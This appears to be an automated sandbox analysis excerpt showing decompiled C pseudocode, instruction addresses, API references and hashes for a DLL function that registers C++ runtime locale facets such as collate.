															__eflags = E6E1DC0B8(_t265, _t289, _t346, _t351, _t360) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t374 - 0x20);
																E6E1E3D74(_t374 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t265, _t351, _t360, 0x14);
																E6E1C6653(_t374 - 0x14, 0);
																_t361 =  *0x6e286e3c; // 0x0
																 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																 *(_t374 - 0x10) = _t361;
																_t177 = E6E1A161C(0x6e286e1c);
																_t296 =  *((intOrPtr*)(_t374 + 8));
																_t352 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t177);
																__eflags = _t352;
																if(_t352 != 0) {
																	L33:
																	E6E1C66BA(_t374 - 0x14);
																	return E6E1E0075(_t352);
																} else {
																	__eflags = _t361;
																	if(_t361 == 0) {
																		_push( *((intOrPtr*)(_t374 + 8)));
																		_push(_t374 - 0x10);
																		__eflags = E6E1DC120(_t265, _t296, _t346, _t352, _t361) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t374 - 0x20);
																			E6E1E3D74(_t374 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t265, _t352, _t361, 0x14);
																			E6E1C6653(_t374 - 0x14, 0);
																			_t362 =  *0x6e286e38; // 0x0
																			 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																			 *(_t374 - 0x10) = _t362;
																			_t190 = E6E1A161C(0x6e286e18);
																			_t303 =  *((intOrPtr*)(_t374 + 8));
																			_t353 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t190);
																			__eflags = _t353;
																			if(_t353 != 0) {
																				L40:
																				E6E1C66BA(_t374 - 0x14);
																				return E6E1E0075(_t353);
																			} else {
																				__eflags = _t362;
																				if(_t362 == 0) {
																					_push( *((intOrPtr*)(_t374 + 8)));
																					_push(_t374 - 0x10);
																					__eflags = E6E1DC1A4(_t265, _t303, _t346, _t353, _t362) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t374 - 0x20);
																						E6E1E3D74(_t374 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t265, _t353, _t362, 0x14);
																						E6E1C6653(_t374 - 0x14, 0);
																						_t363 =  *0x6e286e40; // 0x0
																						 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																						 *(_t374 - 0x10) = _t363;
																						_t203 = E6E1A161C(0x6e286e20);
																						_t310 =  *((intOrPtr*)(_t374 + 8));
																						_t354 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t203);
																						__eflags = _t354;
																						if(_t354 != 0) {
																							L47:
																							E6E1C66BA(_t374 - 0x14);
																							return E6E1E0075(_t354);
																						} else {
																							__eflags = _t363;
																							if(_t363 == 0) {
																								_push( *((intOrPtr*)(_t374 + 8)));
																								_push(_t374 - 0x10);
																								__eflags = E6E1DC229(_t265, _t310, _t346, _t354, _t363) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t374 - 0x20);
																									E6E1E3D74(_t374 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t265, _t354, _t363, 0x14);
																									E6E1C6653(_t374 - 0x14, 0);
																									_t364 =  *0x6e286e44; // 0x0
																									 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																									 *(_t374 - 0x10) = _t364;
																									_t216 = E6E1A161C(0x6e286e24);
																									_t317 =  *((intOrPtr*)(_t374 + 8));
																									_t355 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t216);
																									__eflags = _t355;
																									if(_t355 != 0) {
																										L54:
																										E6E1C66BA(_t374 - 0x14);
																										return E6E1E0075(_t355);
																									} else {
																										__eflags = _t364;
																										if(_t364 == 0) {
																											_push( *((intOrPtr*)(_t374 + 8)));
																											_push(_t374 - 0x10);
																											__eflags = E6E1DC295(_t265, _t317, _t346, _t355, _t364) - 0xffffffff;
																											if(__eflags == 0) {
																												_t321 = _t374 - 0x20;
																												E6E1A1438(_t321);
																												E6E1E3D74(_t374 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e22851f, _t265, _t355, _t364, 4);
																												_t365 = _t321;
																												 *(_t374 - 0x10) = _t365;
																												 *((intOrPtr*)(_t365 + 4)) =  *((intOrPtr*)(_t374 + 0xc));
																												_push( *((intOrPtr*)(_t374 + 0x14)));
																												_t119 = _t374 - 4;
																												 *_t119 =  *(_t374 - 4) & 0x00000000;
																												__eflags =  *_t119;
																												 *_t365 = 0x6e22c414;
																												 *((char*)(_t365 + 0x28)) =  *((intOrPtr*)(_t374 + 0x10));
																												E6E1DD028(_t265, _t321, _t346, _t355, _t365,  *_t119);
																												return E6E1E0075(_t365,  *((intOrPtr*)(_t374 + 8)));
																											} else {
																												_t355 =  *(_t374 - 0x10);
																												 *(_t374 - 0x10) = _t355;
																												 *(_t374 - 4) = 1;
																												E6E1C6FD3(__eflags, _t355);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t355 + 4))))();
																												 *0x6e286e44 = _t355;
																												goto L54;
																											}
																										} else {
																											_t355 = _t364;
																											goto L54;
																										}
																									}
																								} else {
																									_t354 =  *(_t374 - 0x10);
																									 *(_t374 - 0x10) = _t354;
																									 *(_t374 - 4) = 1;
																									E6E1C6FD3(__eflags, _t354);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t354 + 4))))();
																									 *0x6e286e40 = _t354;
																									goto L47;
																								}
																							} else {
																								_t354 = _t363;
																								goto L47;
																							}
																						}
																					} else {
																						_t353 =  *(_t374 - 0x10);
																						 *(_t374 - 0x10) = _t353;
																						 *(_t374 - 4) = 1;
																						E6E1C6FD3(__eflags, _t353);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 4))))();
																						 *0x6e286e38 = _t353;
																						goto L40;
																					}
																				} else {
																					_t353 = _t362;
																					goto L40;
																				}
																			}
																		} else {
																			_t352 =  *(_t374 - 0x10);
																			 *(_t374 - 0x10) = _t352;
																			 *(_t374 - 4) = 1;
																			E6E1C6FD3(__eflags, _t352);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																			 *0x6e286e3c = _t352;
																			goto L33;
																		}
																	} else {
																		_t352 = _t361;
																		goto L33;
																	}
																}
															} else {
																_t351 =  *(_t374 - 0x10);
																 *(_t374 - 0x10) = _t351;
																 *(_t374 - 4) = 1;
																E6E1C6FD3(__eflags, _t351);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																 *0x6e286e34 = _t351;
																goto L26;
															}
														} else {
															_t351 = _t360;
															goto L26;
														}
													}
												} else {
													_t350 =  *(_t374 - 0x10);
													 *(_t374 - 0x10) = _t350;
													 *(_t374 - 4) = 1;
													E6E1C6FD3(__eflags, _t350);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
													 *0x6e286e30 = _t350;
													goto L19;
												}
											} else {
												_t350 = _t359;
												goto L19;
											}
										}
									} else {
										_t349 =  *(_t374 - 0x10);
										 *(_t374 - 0x10) = _t349;
										 *(_t374 - 4) = 1;
										E6E1C6FD3(__eflags, _t349);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
										 *0x6e286e2c = _t349;
										goto L12;
									}
								} else {
									_t349 = _t358;
									goto L12;
								}
							}
						} else {
							_t348 =  *(_t374 - 0x10);
							 *(_t374 - 0x10) = _t348;
							 *(_t374 - 4) = 1;
							E6E1C6FD3(__eflags, _t348);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
							 *0x6e286e28 = _t348;
							goto L5;
						}
					} else {
						_t348 = _t357;
						goto L5;
					}
				}
			}

0x6e1db74c
0x6e1db74c
0x6e1db753
0x6e1db75d
0x6e1db762
0x6e1db76d
0x6e1db771
0x6e1db774
0x6e1db779
0x6e1db77d
0x6e1db782
0x6e1db786
0x6e1db7cb
0x6e1db7ce
0x6e1db7da
0x6e1db788
0x6e1db78a
0x6e1db790
0x6e1db796
0x6e1db79e
0x6e1db7a1
0x6e1db7de
0x6e1db7ec
0x6e1db7f1
0x6e1db7f9
0x6e1db803
0x6e1db808
0x6e1db813
0x6e1db817
0x6e1db81a
0x6e1db81f
0x6e1db828
0x6e1db82a
0x6e1db82c
0x6e1db871
0x6e1db874
0x6e1db880
0x6e1db82e
0x6e1db82e
0x6e1db830
0x6e1db836
0x6e1db83c
0x6e1db844
0x6e1db847
0x6e1db884
0x6e1db892
0x6e1db897
0x6e1db89f
0x6e1db8a9
0x6e1db8ae
0x6e1db8b9
0x6e1db8bd
0x6e1db8c0
0x6e1db8c5
0x6e1db8ce
0x6e1db8d0
0x6e1db8d2
0x6e1db917
0x6e1db91a
0x6e1db926
0x6e1db8d4
0x6e1db8d4
0x6e1db8d6
0x6e1db8dc
0x6e1db8e2
0x6e1db8ea
0x6e1db8ed
0x6e1db92a
0x6e1db938
0x6e1db93d
0x6e1db945
0x6e1db94f
0x6e1db954
0x6e1db95f
0x6e1db963
0x6e1db966
0x6e1db96b
0x6e1db974
0x6e1db976
0x6e1db978
0x6e1db9bd
0x6e1db9c0
0x6e1db9cc
0x6e1db97a
0x6e1db97a
0x6e1db97c
0x6e1db982
0x6e1db988
0x6e1db990
0x6e1db993
0x6e1db9d0
0x6e1db9de
0x6e1db9e3
0x6e1db9eb
0x6e1db9f5
0x6e1db9fa
0x6e1dba05
0x6e1dba09
0x6e1dba0c
0x6e1dba11
0x6e1dba1a
0x6e1dba1c
0x6e1dba1e
0x6e1dba63
0x6e1dba66
0x6e1dba72
0x6e1dba20
0x6e1dba20
0x6e1dba22
0x6e1dba28
0x6e1dba2e
0x6e1dba36
0x6e1dba39
0x6e1dba76
0x6e1dba84
0x6e1dba89
0x6e1dba91
0x6e1dba9b
0x6e1dbaa0
0x6e1dbaab
0x6e1dbaaf
0x6e1dbab2
0x6e1dbab7
0x6e1dbac0
0x6e1dbac2
0x6e1dbac4
0x6e1dbb09
0x6e1dbb0c
0x6e1dbb18
0x6e1dbac6
0x6e1dbac6
0x6e1dbac8
0x6e1dbace
0x6e1dbad4
0x6e1dbadc
0x6e1dbadf
0x6e1dbb1c
0x6e1dbb2a
0x6e1dbb2f
0x6e1dbb37
0x6e1dbb41
0x6e1dbb46
0x6e1dbb51
0x6e1dbb55
0x6e1dbb58
0x6e1dbb5d
0x6e1dbb66
0x6e1dbb68
0x6e1dbb6a
0x6e1dbbaf
0x6e1dbbb2
0x6e1dbbbe
0x6e1dbb6c
0x6e1dbb6c
0x6e1dbb6e
0x6e1dbb74
0x6e1dbb7a
0x6e1dbb82
0x6e1dbb85
0x6e1dbbc2
0x6e1dbbd0
0x6e1dbbd5
0x6e1dbbdd
0x6e1dbbe7
0x6e1dbbec
0x6e1dbbf7
0x6e1dbbfb
0x6e1dbbfe
0x6e1dbc03
0x6e1dbc0c
0x6e1dbc0e
0x6e1dbc10
0x6e1dbc55
0x6e1dbc58
0x6e1dbc64
0x6e1dbc12
0x6e1dbc12
0x6e1dbc14
0x6e1dbc1a
0x6e1dbc20
0x6e1dbc28
0x6e1dbc2b
0x6e1dbc65
0x6e1dbc68
0x6e1dbc76
0x6e1dbc7b
0x6e1dbc83
0x6e1dbc88
0x6e1dbc8a
0x6e1dbc90
0x6e1dbc93
0x6e1dbc9c
0x6e1dbc9c
0x6e1dbc9c
0x6e1dbca0
0x6e1dbca6
0x6e1dbca9
0x6e1dbcb5
0x6e1dbc2d
0x6e1dbc2d
0x6e1dbc30
0x6e1dbc34
0x6e1dbc38
0x6e1dbc45
0x6e1dbc4d
0x6e1dbc4f
0x00000000
0x6e1dbc4f
0x6e1dbc16
0x6e1dbc16
0x00000000
0x6e1dbc16
0x6e1dbc14
0x6e1dbb87
0x6e1dbb87
0x6e1dbb8a
0x6e1dbb8e
0x6e1dbb92
0x6e1dbb9f
0x6e1dbba7
0x6e1dbba9
0x00000000
0x6e1dbba9
0x6e1dbb70
0x6e1dbb70
0x00000000
0x6e1dbb70
0x6e1dbb6e
0x6e1dbae1
0x6e1dbae1
0x6e1dbae4
0x6e1dbae8
0x6e1dbaec
0x6e1dbaf9
0x6e1dbb01
0x6e1dbb03
0x00000000
0x6e1dbb03
0x6e1dbaca
0x6e1dbaca
0x00000000
0x6e1dbaca
0x6e1dbac8
0x6e1dba3b
0x6e1dba3b
0x6e1dba3e
0x6e1dba42
0x6e1dba46
0x6e1dba53
0x6e1dba5b
0x6e1dba5d
0x00000000
0x6e1dba5d
0x6e1dba24
0x6e1dba24
0x00000000
0x6e1dba24
0x6e1dba22
0x6e1db995
0x6e1db995
0x6e1db998
0x6e1db99c
0x6e1db9a0
0x6e1db9ad
0x6e1db9b5
0x6e1db9b7
0x00000000
0x6e1db9b7
0x6e1db97e
0x6e1db97e
0x00000000
0x6e1db97e
0x6e1db97c
0x6e1db8ef
0x6e1db8ef
0x6e1db8f2
0x6e1db8f6
0x6e1db8fa
0x6e1db907
0x6e1db90f
0x6e1db911
0x00000000
0x6e1db911
0x6e1db8d8
0x6e1db8d8
0x00000000
0x6e1db8d8
0x6e1db8d6
0x6e1db849
0x6e1db849
0x6e1db84c
0x6e1db850
0x6e1db854
0x6e1db861
0x6e1db869
0x6e1db86b
0x00000000
0x6e1db86b
0x6e1db832
0x6e1db832
0x00000000
0x6e1db832
0x6e1db830
0x6e1db7a3
0x6e1db7a3
0x6e1db7a6
0x6e1db7aa
0x6e1db7ae
0x6e1db7bb
0x6e1db7c3
0x6e1db7c5
0x00000000
0x6e1db7c5
0x6e1db78c
0x6e1db78c
0x00000000
0x6e1db78c
0x6e1db78a

APIs

__EH_prolog3.LIBCMT ref: 6E1DB753
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DB75D
int.LIBCPMT ref: 6E1DB774

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

collate.LIBCPMT ref: 6E1DB797
std::_Facet_Register.LIBCPMT ref: 6E1DB7AE
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DB7CE
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DB7EC

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: 98445c1ec7342c449eadbc061b2d943b7b6773669db081b4e0d671e4bda8d183
Instruction ID: 094176256fb9e451f98f329bf7a8ca4d108f437433029e7cc1779f044fd084af
Opcode Fuzzy Hash: 98445c1ec7342c449eadbc061b2d943b7b6773669db081b4e0d671e4bda8d183
Instruction Fuzzy Hash: 4811367691051C8BCF01EBE4C894EFEB77AAF54724F140908E411AB3D0DF749988EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB7F2, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1DB7F2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t330 - 0x14, 0);
				_t315 =  *0x6e286e2c; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6E1A161C(0x6e286e0c);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6E1C66BA(_t330 - 0x14);
					return E6E1E0075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6E1DBFE8(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t330 - 0x20);
							E6E1E3D74(_t330 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t307, _t315, 0x14);
							E6E1C6653(_t330 - 0x14, 0);
							_t316 =  *0x6e286e30; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6E1A161C(0x6e286e10);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6E1C66BA(_t330 - 0x14);
								return E6E1E0075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6E1DC050(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t330 - 0x20);
										E6E1E3D74(_t330 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t234, _t308, _t316, 0x14);
										E6E1C6653(_t330 - 0x14, 0);
										_t317 =  *0x6e286e34; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6E1A161C(0x6e286e14);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6E1C66BA(_t330 - 0x14);
											return E6E1E0075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6E1DC0B8(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t330 - 0x20);
													E6E1E3D74(_t330 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t234, _t309, _t317, 0x14);
													E6E1C6653(_t330 - 0x14, 0);
													_t318 =  *0x6e286e3c; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6E1A161C(0x6e286e1c);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6E1C66BA(_t330 - 0x14);
														return E6E1E0075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6E1DC120(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t330 - 0x20);
																E6E1E3D74(_t330 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t234, _t310, _t318, 0x14);
																E6E1C6653(_t330 - 0x14, 0);
																_t319 =  *0x6e286e38; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6E1A161C(0x6e286e18);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6E1C66BA(_t330 - 0x14);
																	return E6E1E0075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6E1DC1A4(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t330 - 0x20);
																			E6E1E3D74(_t330 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t234, _t311, _t319, 0x14);
																			E6E1C6653(_t330 - 0x14, 0);
																			_t320 =  *0x6e286e40; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6E1A161C(0x6e286e20);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6E1C66BA(_t330 - 0x14);
																				return E6E1E0075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6E1DC229(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t330 - 0x20);
																						E6E1E3D74(_t330 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t234, _t312, _t320, 0x14);
																						E6E1C6653(_t330 - 0x14, 0);
																						_t321 =  *0x6e286e44; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6E1A161C(0x6e286e24);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6E1C66BA(_t330 - 0x14);
																							return E6E1E0075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6E1DC295(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6E1A1438(_t283);
																									E6E1E3D74(_t330 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e22851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6e22c414;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6E1DD028(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6E1E0075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6E1C6FD3(__eflags, _t313);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6e286e44 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6E1C6FD3(__eflags, _t312);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6e286e40 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6E1C6FD3(__eflags, _t311);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6e286e38 = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6E1C6FD3(__eflags, _t310);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6e286e3c = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6E1C6FD3(__eflags, _t309);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6e286e34 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6E1C6FD3(__eflags, _t308);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6e286e30 = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6E1C6FD3(__eflags, _t307);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6e286e2c = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}

0x6e1db7f2
0x6e1db7f2
0x6e1db7f9
0x6e1db803
0x6e1db808
0x6e1db813
0x6e1db817
0x6e1db81a
0x6e1db81f
0x6e1db823
0x6e1db828
0x6e1db82c
0x6e1db871
0x6e1db874
0x6e1db880
0x6e1db82e
0x6e1db830
0x6e1db836
0x6e1db83c
0x6e1db844
0x6e1db847
0x6e1db884
0x6e1db892
0x6e1db897
0x6e1db89f
0x6e1db8a9
0x6e1db8ae
0x6e1db8b9
0x6e1db8bd
0x6e1db8c0
0x6e1db8c5
0x6e1db8ce
0x6e1db8d0
0x6e1db8d2
0x6e1db917
0x6e1db91a
0x6e1db926
0x6e1db8d4
0x6e1db8d4
0x6e1db8d6
0x6e1db8dc
0x6e1db8e2
0x6e1db8ea
0x6e1db8ed
0x6e1db92a
0x6e1db938
0x6e1db93d
0x6e1db945
0x6e1db94f
0x6e1db954
0x6e1db95f
0x6e1db963
0x6e1db966
0x6e1db96b
0x6e1db974
0x6e1db976
0x6e1db978
0x6e1db9bd
0x6e1db9c0
0x6e1db9cc
0x6e1db97a
0x6e1db97a
0x6e1db97c
0x6e1db982
0x6e1db988
0x6e1db990
0x6e1db993
0x6e1db9d0
0x6e1db9de
0x6e1db9e3
0x6e1db9eb
0x6e1db9f5
0x6e1db9fa
0x6e1dba05
0x6e1dba09
0x6e1dba0c
0x6e1dba11
0x6e1dba1a
0x6e1dba1c
0x6e1dba1e
0x6e1dba63
0x6e1dba66
0x6e1dba72
0x6e1dba20
0x6e1dba20
0x6e1dba22
0x6e1dba28
0x6e1dba2e
0x6e1dba36
0x6e1dba39
0x6e1dba76
0x6e1dba84
0x6e1dba89
0x6e1dba91
0x6e1dba9b
0x6e1dbaa0
0x6e1dbaab
0x6e1dbaaf
0x6e1dbab2
0x6e1dbab7
0x6e1dbac0
0x6e1dbac2
0x6e1dbac4
0x6e1dbb09
0x6e1dbb0c
0x6e1dbb18
0x6e1dbac6
0x6e1dbac6
0x6e1dbac8
0x6e1dbace
0x6e1dbad4
0x6e1dbadc
0x6e1dbadf
0x6e1dbb1c
0x6e1dbb2a
0x6e1dbb2f
0x6e1dbb37
0x6e1dbb41
0x6e1dbb46
0x6e1dbb51
0x6e1dbb55
0x6e1dbb58
0x6e1dbb5d
0x6e1dbb66
0x6e1dbb68
0x6e1dbb6a
0x6e1dbbaf
0x6e1dbbb2
0x6e1dbbbe
0x6e1dbb6c
0x6e1dbb6c
0x6e1dbb6e
0x6e1dbb74
0x6e1dbb7a
0x6e1dbb82
0x6e1dbb85
0x6e1dbbc2
0x6e1dbbd0
0x6e1dbbd5
0x6e1dbbdd
0x6e1dbbe7
0x6e1dbbec
0x6e1dbbf7
0x6e1dbbfb
0x6e1dbbfe
0x6e1dbc03
0x6e1dbc0c
0x6e1dbc0e
0x6e1dbc10
0x6e1dbc55
0x6e1dbc58
0x6e1dbc64
0x6e1dbc12
0x6e1dbc12
0x6e1dbc14
0x6e1dbc1a
0x6e1dbc20
0x6e1dbc28
0x6e1dbc2b
0x6e1dbc65
0x6e1dbc68
0x6e1dbc76
0x6e1dbc7b
0x6e1dbc83
0x6e1dbc88
0x6e1dbc8a
0x6e1dbc90
0x6e1dbc93
0x6e1dbc9c
0x6e1dbc9c
0x6e1dbc9c
0x6e1dbca0
0x6e1dbca6
0x6e1dbca9
0x6e1dbcb5
0x6e1dbc2d
